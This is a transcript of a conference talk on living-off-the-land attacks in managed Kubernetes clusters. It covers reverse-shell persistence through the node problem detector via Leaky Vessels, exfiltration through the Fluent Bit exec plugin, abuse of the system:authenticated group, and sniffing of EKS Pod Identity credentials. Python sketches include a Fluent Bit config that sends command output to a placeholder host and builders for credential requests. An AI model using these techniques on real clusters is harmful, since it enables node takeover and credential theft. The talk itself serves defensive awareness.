Hello, everybody. Bonjour. Thanks for sticking around. Welcome to our session on living off the land techniques in managed Kubernetes clusters. My name is Shay Berkovich. I'm proud to be a part of the amazing Wiz threat research team; you might know us from these projects. And with me today... I'm Ronen Shustin, from the Wiz vulnerability research team, and you might know us from research like BrokenSesame, BingBang, and many more.

All right, so what are we talking about here today? Living off the land techniques. Let's go back to basics and start with the definition. The Merriam-Webster dictionary defines living off the land as getting food by farming, hunting, etc. Okay, we know that, but there is this element of using what's available in the environment. And that's so true for the classic cybersecurity definition, right? Albeit the classic definition talks more about binaries, binaries on the host. So those two big projects, GTFOBins and LOLBAS, are pretty much categorized lists and collections of binaries that can be exploited by attackers once they have initial access on the host. My favorite from the OSCP days, for those in the know, was certutil, which I used to download enumeration scripts to my Windows host in the absence of curl or wget, for example. That's the classic example. And that was fine back then, when by "initial access" and "attacker" we thought about a VM or a host, perhaps after escaping some kind of web application, finding the RCE. However, this has changed. Now an attacker might find themselves in different contexts: it can be a pod within Kubernetes, it can of course be a node, it can perhaps even be a Lambda function; they might own a Lambda function in the cloud. So as the definition of the attack chain and the attack process has evolved, so should the definition of living off the land techniques evolve. Just like the Metapod Pokemon.
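To ground that classic "use what's already there" mindset before we extend it to Kubernetes, here is a minimal sketch (ours, not from the talk or the catalogs) in the spirit of GTFOBins/LOLBAS: inventory which well-known download-capable binaries a host already ships. The candidate list is purely illustrative.

```python
# A minimal sketch of the "use what's already there" mindset, in the spirit of
# the GTFOBins/LOLBAS catalogs: check which well-known download-capable
# binaries a host already ships. The candidate list is ours, purely illustrative.
import shutil

CANDIDATES = ["curl", "wget", "sftp", "scp", "openssl", "python3", "perl", "busybox"]

def lol_inventory(candidates=CANDIDATES):
    """Map each candidate binary name to its resolved path, or None if absent."""
    return {name: shutil.which(name) for name in candidates}

if __name__ == "__main__":
    for name, path in lol_inventory().items():
        print(f"{name}: {path or 'absent'}")
```

An attacker with a foothold runs something like this first; a defender can run the same inventory to know what an attacker would find.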
Okay, so for the updated definition, I want to take you to the CISA joint guidance. They released it on February 10th, if I'm not mistaken, so pretty much a month ago: CISA and allied agencies released guidance on on-prem and cloud living off the land techniques. And even though they released it past our CFP submission and acceptance, we thought it would be a shame not to include it, because their findings really resonated with us. So let's take their definition: native tools and processes on systems (I would also add workflows), and the second point is a lower likelihood of being detected or blocked. I think those two points together describe the definition.

But now, what makes living off the land (LOTL) techniques different from other attack scenarios? There are three points. First, there's a lack of established baselines on the defense side. Second, the lack of conventional IOCs. And third, it just makes the attacker's job easier, right? They don't need to develop their own tools; they just use whatever they have. Altogether, it makes LOTL techniques a real problem to recognize and detect, specifically in Kubernetes clusters.

Now, the CISA guidance talks about cloud and on-prem, which is a shame because we're at KubeCon. So we want to extend it to Kubernetes. Not just extend, but also enumerate: we'll present a series of demos of those techniques to persuade you that this is a real problem and that there are multiple techniques out there, and we'll try to standardize them somehow. For standardization, we'll use the threat matrix. Don't worry, not this one; we'll focus on the Kubernetes threat matrix. Now, when we talk about the threat matrix: which stages of the matrix are LOTL techniques actually applicable to? Pretty much all of them; aside from initial access, every stage up to and including impact.
Living off the land techniques are pertinent across the board; they can be abused anywhere. Why managed clusters? Why are we talking about managed clusters specifically? Well, using the academic language, it's because they have a lot of stuff. A default AKS cluster, an empty cluster that you stand up, already has all these workloads running; you can see there are like three namespaces and a bunch of workloads. So we can abuse this, right? Additional services mean more complexity, which means an increased attack surface. That's always true, and we love attack surface as security researchers.

Okay, where can we find living off the land material? Well, in the typical scenario, attackers find themselves with execution in a pod: some application they find and exploit. So there are the pod image binaries, but that's not very interesting. The image can be CentOS, which is huge, but it could also be distroless, which doesn't even have a shell. So there's a huge variance in the binaries that attackers might find there. But how about the Kubernetes node image? That's more stable. You can see that in EKS, GKE, and AKS, the node images (AMIs and their equivalents) pack tons of tools that are useful, in this case, for just downloading something from the internet. Do you really think a Kubernetes worker node needs SFTP? I'm not sure. I don't know, but it's there, so we might use it. Okay, but this assumes the attacker has Kubernetes node access, which is not always true, of course. Then what else can we use? We can use the pre-installed middleware workloads: Deployments, StatefulSets, any Kubernetes workload object. DaemonSets are even better. Why? Because they run on every node, so it doesn't matter where attackers find themselves; they can use that workload. Also CronJobs and Jobs, which are great because they are periodic in nature. But also users and groups: the various managed solutions add their own users and groups on top of what a vanilla Kubernetes cluster already has.
And there's even core control plane functionality, which we're not going to talk about today, but there has been research on using, for example, the Kubernetes API server for SSRF. Okay, let's dive into the specific use cases. We'll start with persistence. For this, we'll use our Shuckle Pokemon, a symbol of persistence, of course. And as our persistence example, we'll abuse the node problem detector. For those of you who have never heard of node problem detector: it's a tool that is present on all GKE and AKS clusters. In fact, it's a systemd process on the worker nodes, though it can be installed as a DaemonSet as well. And it's also installed on many EKS clusters, because it appears in the recommendations in the best practices guide, where they say to go install it as a DaemonSet. This process performs various diagnostic activities. It runs as root on the node and makes sure the node is healthy by performing various checks.

So let's focus on GKE and see how it looks there. If you run `ps aux` on the worker node, this is what you get: the NPD process with a bunch of --config flags pointing at a bunch of JSON files. What do those JSONs say? They say what to do, which diagnostic action to perform. In this case, the cctl monitor JSON says (I hope you can see the fourth line) every six hours, run this Python script with the following parameters. Okay, good. As attackers, we immediately ask: what can we do if we override this JSON? Well, not much, because you still need to restart the node problem detector to pick up the new config, and that may be a bit noisy. However, what can we do if we manage to override the Python script? You see where I'm going with this. Before we put together a demo and the attack chain, I quickly want to tell you about Leaky Vessels, which was a set of vulnerabilities. Who here has heard about Leaky Vessels? Yeah, okay, so I'll be very, very short.
Leaky Vessels is a set of vulnerabilities in runc and BuildKit that allows attackers a build-time escape and a container runtime escape. And that's what we're going to use in the demo. So now we can put together the attack chain. The attacker uses a compromised image, a poisoned image, you name it, and uses Leaky Vessels to escape onto the node. As attackers, we override the cctl monitor Python script, and we let node problem detector pick up and execute the new script. The new script communicates with the C2 server. What do we achieve by this? We bypass the Kubernetes audit log and, of course, the admission controller, because we're not going through the Kubernetes API; it is blind to our actions. We'll probably bypass the sensor or EDR solution. Why? Because we're piggybacking on a known process. Privilege escalation, persistence, evasion.

Okay, let's see this in action. On the left side I have access to a pod; that's a GKE pod, and Andy Dufresne is my hacking pod that has execution on the node. That's its only purpose. I'm showing you that the hostname of the node is gke-shay-something; that's our worker node. Now I'm showing you the content of that cctl monitor JSON. You see the location, npd-custom-plugins/config; that's on the node. And now I'm showing you the content of the cctl monitor Python script that we will overwrite. For now it's not very interesting; it's just a diagnostic that node problem detector runs periodically every six hours. But we will overwrite it, and that's the interesting part. How will we overwrite it? By using the malicious image. An unsuspecting cluster operator will run this innocent image called cve-2024-21626, shown in the bottom right corner. It uses the WORKDIR directive to abuse the Leaky Vessels runc vulnerability. It has only one command: it overwrites the existing cctl_monitor.py on the node.
You see the path traversal into /home/kubernetes, replacing the script with our own cctl_monitor.py, which is just a good old Python reverse shell to our C2 server. At the top right corner, you see our C2 server listening on port 4444. Now the cluster operator starts the image, and it's done; you see the leaky pod completed. Okay, something happened: it pulled the image, so I guess it worked, but of course we need to check. Let's see what the actual Python script looks like now. I'm dumping the script, and you can see that this is the new Python code. So Leaky Vessels worked. Good; now we just need to wait six hours for the reverse shell connection. Of course I trimmed the video. So any moment now... there we go: we have the connection on the C2 server. The connection is root on the worker node; you can see the hostname of the worker node. We have access to all the processes, including the node problem detector itself. We don't have any namespace restrictions. And we have access to /var/lib/kubelet, where, of course, kubelet keeps all the information about local pods, including service account tokens, et cetera. Pretty cool, if you ask me.

All right, so that's persistence; let's move on to collection. For people who are into Pokemon, I think Porygon is the one that represents collection: information assembly. So I hope you see where I'm going with it. Fluent Bit, okay. Fluent Bit is a very well-known log processor and management solution. We love it because it's installed by default on GKE and AKS, and it's recommended for installation in the EKS best practices guide as well. The configuration affecting Fluent Bit goes through a config map, fluent-bit-config. And this config looks as follows: there's a sequence of INPUT, PARSER, FILTER, and OUTPUT sections, which tell Fluent Bit what to do, which logs to assemble, and where to send them.
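To make that section format concrete, here is a hedged sketch that renders an INPUT/OUTPUT pair of the kind an attacker could slip into the config map. The plugin names and options (the `exec` input with Command/Interval_Sec, the `http` output with Host/Port/Format) come from Fluent Bit's public documentation; the command, host, port, and interval values are hypothetical placeholders, not the talk's exact demo values.

```python
# Renders an INPUT/OUTPUT section pair in Fluent Bit's classic config format.
# Plugin names and options (`exec` input, `http` output) are from Fluent Bit's
# public documentation; command/host/port/interval are hypothetical placeholders.
def exec_sections(command="hostname; id", host="203.0.113.10", port=4444, interval=5):
    return (
        "[INPUT]\n"
        "    Name          exec\n"
        "    Tag           exfil\n"
        f"    Command       {command}\n"
        f"    Interval_Sec  {interval}\n"
        "\n"
        "[OUTPUT]\n"
        "    Name    http\n"
        "    Match   exfil\n"
        f"    Host    {host}\n"
        f"    Port    {port}\n"
        "    Format  json\n"
    )

print(exec_sections())
```

Appending these two sections to an otherwise benign fluent-bit-config leaves the legitimate pipeline intact, which is exactly what makes the change easy to miss.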
Now, as attackers, we immediately ask ourselves: okay, if we can modify it, what happens? Good things happen, because we can use the exec plugin. As attackers, of course, we love plugins called exec, because they do exactly that: they execute commands. In this case, here is an example from the official Fluent Bit documentation where `ls /var/log` is executed every one second. Okay, how can we abuse it? Here's our attack chain. Assuming we have update permission on the config map (or more powerful permissions, but that's all the access we need), we add an INPUT section and an OUTPUT section to the config map, and we let new Fluent Bit pods pick up the new config map and send the logs to the C2. That achieves exfiltration. And again, we bypass the Kubernetes audit log, we bypass the admission controller, we bypass the sensor, and our malicious config map is resistant to restarts because it now resides in etcd. So we achieve collection, persistence, and evasion.

Okay, let's see this in action. I hope you can hear me, because the noise is quite serious out there. On the left, you see that I'm running two Fluent Bit pods, because it's a DaemonSet and I have two nodes. Now I'm showing you the config map affecting the Fluent Bit config; it's called fluent-bit-config. And by the way, this is an EKS cluster; I guess you can tell by the amazon-cloudwatch namespace. This is the content of the config map. It's pretty messy when unformatted, but it starts with application-log.conf, and it defines the collection of certain application logs. But I want to show you our malicious Fluent Bit config, which is very similar to the original; however, it adds two small sections. It abuses that exec plugin I was talking about: INPUT and OUTPUT. In the INPUT, we're asking Fluent Bit to please execute hostname, id, and ls -la.
It runs every five seconds (we control the interval) and sends the output to our C2 server on port 4444 over plain HTTP. That's it. So now I'm starting my Python C2 server, applying the new config map, and hoping that it'll work. And... nothing happened. Why? Because the pods still haven't applied the new config, right? So here I'm killing the second pod on purpose, and because it's a DaemonSet, a new pod will spawn and pick up the new configuration. In a production cluster, however, there is a natural process of shrinking and growing, so every new node that comes up because of scheduling or load will pick up the new, malicious config. All right, so now I'm deleting the pod, and I expect a new pod to start automatically. There it is: the last pod, you see, five seconds old? That's the new pod. So any moment now... we're getting the information. We're getting the output of Fluent Bit running those shell commands. You can see the first one is hostname, the second one is id, and then the output of each. And you see the user agent is Fluent Bit. Fluent Bit is so nice that it packs everything in nice JSON and timestamps every command that it runs, because it is, of course, a log management solution.

And at this point, I'm passing over to Ronen for privilege escalation. All right, thank you, Shay. So now we'll talk a bit about privilege escalation techniques. CISA's guidance shows us a lot of privilege escalation techniques in cloud environments. However, of course, we are at KubeCon and we are interested in managed clusters, so let's see how we can apply those privilege escalation techniques to managed clusters. The first example we chose to show you today is on Azure Kubernetes Service: more specifically, how we can use Entra ID authentication, combined with some user misconfigurations, to our advantage.
So let's first see how many different authentication and authorization methods AKS offers. The first is local accounts with Kubernetes role-based access control (RBAC), basically the one we all know. The second is Entra ID authentication with Kubernetes RBAC, maintaining the familiar authorization model. And the third is Entra ID authentication combined with Azure RBAC, which is Azure's own access control; it's not unique to Kubernetes and also supports many other services. In the next few slides, we'll focus only on clusters configured with Entra ID authentication.

So let's imagine we are a regular user and we want to perform some operation in our cluster. How will it look? We first perform a login to our identity provider, in our case Entra ID. Next, we receive a token, which we then use against our Kubernetes cluster. If you use the Azure CLI or similar tooling, your kubectl should already be set up to do this automatically. Then we perform our operation with the token, and behind the scenes the API server performs the authentication against an external webhook server, which validates the JWT, queries the Microsoft Graph API for various user details, and returns them to the Kubernetes API server, which now has to authorize the request. (In some cases there is also another external webhook server responsible for authorization.) If the Kubernetes API server authorizes the request, it performs the request and returns the data to the user. Now, I think the most interesting part of this section is that we're still authenticating with Entra ID, and that means basically every service principal and every user in our directory (a directory is basically equivalent to a tenant) will be able to authenticate to our cluster.
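The "generate a token" step above is done with curl in the talk; here is a hedged Python sketch of the same client-credentials exchange. The token endpoint format is Entra ID's standard v2.0 endpoint, and the scope uses the well-known AKS server application ID as the audience; the tenant and client values are placeholders, and the function only builds the request rather than sending it.

```python
# Builds (but does not send) the client-credentials token request against the
# Entra ID v2.0 token endpoint. The scope targets the well-known AKS server
# application ID; tenant/client values are placeholders.
import urllib.parse
import urllib.request

AKS_SERVER_APP_ID = "6dae42f8-4368-4678-94ff-3960e28e3630"

def build_token_request(tenant_id, client_id, client_secret):
    url = f"https://login.microsoftonline.com/{tenant_id}/oauth2/v2.0/token"
    body = urllib.parse.urlencode({
        "grant_type": "client_credentials",
        "client_id": client_id,
        "client_secret": client_secret,
        "scope": f"{AKS_SERVER_APP_ID}/.default",
    }).encode()
    return urllib.request.Request(url, data=body, method="POST")
```

Sending this request with valid (even completely unprivileged) service principal credentials returns a token the cluster will accept as authenticated, which is the whole point of the next slide.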
Now, it doesn't mean they will automatically be allowed to perform any operation on the cluster, but they'll still be authenticated. Let's keep that in mind for the next few slides. So let's imagine we somehow obtained random service principal credentials in our directory. How will it look when we want to perform some operations on a cluster configured with Entra ID? First, we use those credentials to generate a token, which we then use against our cluster; we can do this with a curl command. Next, we use kubectl against our cluster and, for example, perform a get secrets operation. And, of course, we are denied, because we're not authorized to perform any operation. However, let's see what the logs show behind the scenes. We can see the response status, basically the same error we received before. But let's focus on the user section and, more specifically, on the groups: we can see that we are part of the system:authenticated group. We are a random user in our directory, and we're part of the system:authenticated group, which groups all authenticated identities.

Now, why is this even interesting for us? We've seen many cases where cluster administrators tend to trust the system:authenticated group and bind roles to it that may carry higher privileges. Combined with the ability of any identity in the tenant to authenticate to a cluster configured with Entra ID, this can be an open door for privilege escalation and lateral movement. And, finally, GKE behaved the same way: a couple of months ago, security researchers found that every Google account could authenticate to any GKE cluster and also be part of the system:authenticated group, and they likewise found that many users tend to trust that group and bind roles to it that may carry higher privileges. So now let's see a short demo of how it works.
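On the defending side, this misconfiguration is easy to hunt for. A minimal sketch, assuming the bindings have already been fetched as parsed JSON (for example from `kubectl get clusterrolebindings -o json`, taking the items list); the function and its name are ours, purely illustrative:

```python
# Flags RBAC bindings whose subjects include the catch-all authenticated
# groups, given bindings as parsed dicts (e.g. the `items` list from
# `kubectl get clusterrolebindings -o json`).
RISKY_GROUPS = {"system:authenticated", "system:unauthenticated"}

def risky_bindings(bindings):
    flagged = []
    for binding in bindings:
        for subject in binding.get("subjects") or []:
            if subject.get("kind") == "Group" and subject.get("name") in RISKY_GROUPS:
                flagged.append(binding["metadata"]["name"])
    return flagged
```

Any binding this flags grants its role to every identity that can merely authenticate, which on an Entra ID cluster means the whole tenant.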
All right, apologies for the small font. Let's say we have a cluster configured with Entra ID authentication, and we have a ClusterRoleBinding which binds a powerful role to the system:authenticated group; it basically grants us get pods, list pods, and all that stuff, plus list secrets. Now we'll use random service principal credentials to generate a token, which is then used against our Kubernetes cluster configured with Entra ID. Then we'll use the token, for example, to perform a get deployments operation, and we can see that of course we are denied, because we are not authorized for that operation. But let's see what we actually can do: we can get pods, list pods, and list secrets, because we are indeed part of the system:authenticated group. So let's use our permissions to get those resources. All right, that's basically it for the demo.

Now we'll talk about EKS Pod Identity. For those who are not familiar with it, it's a new feature AWS released a couple of months ago that basically helps bridge access from service accounts to AWS resources. In the next few slides, we'll see an example of how we can use EKS Pod Identity to our advantage using the hostNetwork: true configuration. Let's see, at a very high level, how it works; I won't really get into details. After installing the EKS Pod Identity add-on on our cluster, we're introduced to two new components. The first is the pod identity webhook, and the second is a DaemonSet called the EKS Pod Identity Agent, which essentially serves as the credential broker. From now on, each pod configured with a service account that wants access to AWS resources, and that is configured with a role, will perform an HTTP request to the EKS Pod Identity Agent that sits on the same worker node, basically asking it to fetch the necessary role credentials.
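That in-node exchange can be sketched as follows. This is a hedged illustration, not the talk's exact tooling: the link-local address and /v1/credentials path follow AWS's documented container-credentials URI for this feature, and the Authorization value normally comes from the file named by AWS_CONTAINER_AUTHORIZATION_TOKEN_FILE. The function only builds the request.

```python
# Builds (but does not send) the credential request a pod issues to the EKS
# Pod Identity Agent on its node. Address and path follow AWS's documented
# container-credentials URI; the auth token is read from a projected file.
import urllib.request

AGENT_URL = "http://169.254.170.23/v1/credentials"

def build_credential_request(auth_token):
    # Note: plain HTTP on the node, so a hostNetwork sniffer on the same
    # worker node can observe both this request and the credential response.
    return urllib.request.Request(AGENT_URL, headers={"Authorization": auth_token})
```

The point for the attack that follows is in the comment: because the exchange is HTTP rather than HTTPS, it is visible to anyone who can capture the node's traffic.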
And of course the agent will do that; it returns the credentials to the pod, which can then access its configured AWS resources. So now let's see how we can use that, as a potential attacker, with the hostNetwork: true configuration. Let's say we have a worker node that contains two pods. The first is pod A, which has hostNetwork: true; for those who are not familiar, this configuration gives the pod access to the network adapters of the worker node, and with the right capabilities it also allows capturing all the traffic on the worker node. Let's assume a malicious actor was able to get access to pod A. Next we have pod B, which happens to have a service account with access to S3 buckets. As I said on the previous slide, to get access to those resources it first sends a request behind the scenes to the EKS Pod Identity Agent on the same worker node, and then it receives the credentials that allow it to access the S3 buckets. Now, because from pod A we have the capability to perform a network capture, we can capture the token returned by the EKS Pod Identity Agent to pod B, because the traffic between them is HTTP, not HTTPS. So now let's see a demo of how it works.

All right, so on the left side we'll create a pod with the hostNetwork: true configuration, which allows an attacker to perform a network capture. We'll also have another pod, which we'll call bucket-reader, with a service account configured to have access to an S3 bucket. And we'll simulate, for example, an sts get-caller-identity call to show us which role we have; behind the scenes it should perform a request to the EKS Pod Identity Agent and receive its role credentials.
On the right side we now perform the network capture, and we see that we are able to capture the response from the EKS Pod Identity Agent and receive the token. So we were able to obtain the token from EKS Pod Identity via a network capture, and now we can use it, for example from pod A, the attacker, to assume the identity and possibly access the S3 bucket of pod B. So now I'll pass the mic back to Shay to conclude our presentation. Thank you.

Thanks, Ronen. So that was privilege escalation from Kubernetes into the cloud; I guess impact is also one of the stages affected by living off the land techniques. All right, I hope we persuaded you that there's a real problem out there in managed Kubernetes clusters, and that we need to do something about it. What can we do, though? Well, how about we start with awareness? How about we update the threat matrix to include living off the land components such as node problem detector and Fluent Bit; there are others as well that we didn't include in the presentation. That's a good first step. But maybe we can do more. We're planning to create a project, a GitHub repo or website, that will collect those techniques, something like the LOLBAS project. Maybe KubeLOLs? If you have a funny, witty name you want to suggest for this project, ping us; we'll be happy to hear it. Also, we would love to encourage the CSPs to publish whatever they ship in their managed clusters. Call it a KBOM or any other word, but ultimately users want to know what they run in their clusters. Right now, that's not the situation. Think about vulnerability management: how can we trace it? How do we know in which clusters, and in which versions, we have a vulnerable component? We don't. So this is not everything, but I think these are several good steps towards solving the problem, towards that same baseline the CISA guidance talks about; though we probably don't yet fully understand what that baseline looks like.
Still, these are steps in the right direction, I think. Okay, that's all we have for today. Thank you all for attending. If you have questions, feel free; we're going to hang around here as well. Thank you. Thank you very much.

Hello, I have a question. You showed a nice example with Fluent Bit, but generally, whatever solution you use for logs, the current situation in Kubernetes is that it's always going to be a high-privileged pod. Logs are generally just reading a stream of text, right? So is there really a need for a high-privileged pod for such a simple use case? And are you aware of any work in the Kubernetes ecosystem to change that architecturally?

Well, it's not really a high-privileged pod. Fluent Bit just has sensitive mappings into /var/lib/kubelet in order to collect the logs. So it's not high-privileged; it just exfiltrates the data, right? And the key here is to understand the risks in your managed clusters. The CSPs don't tell us that giving config map update permission to somebody can lead to whole-cluster compromise. They don't say it, right? But it's true; it's the reality. So I think knowing those risks is a good first step. But I agree, I don't think everything can be non-privileged.

Okay, thanks. Thank you.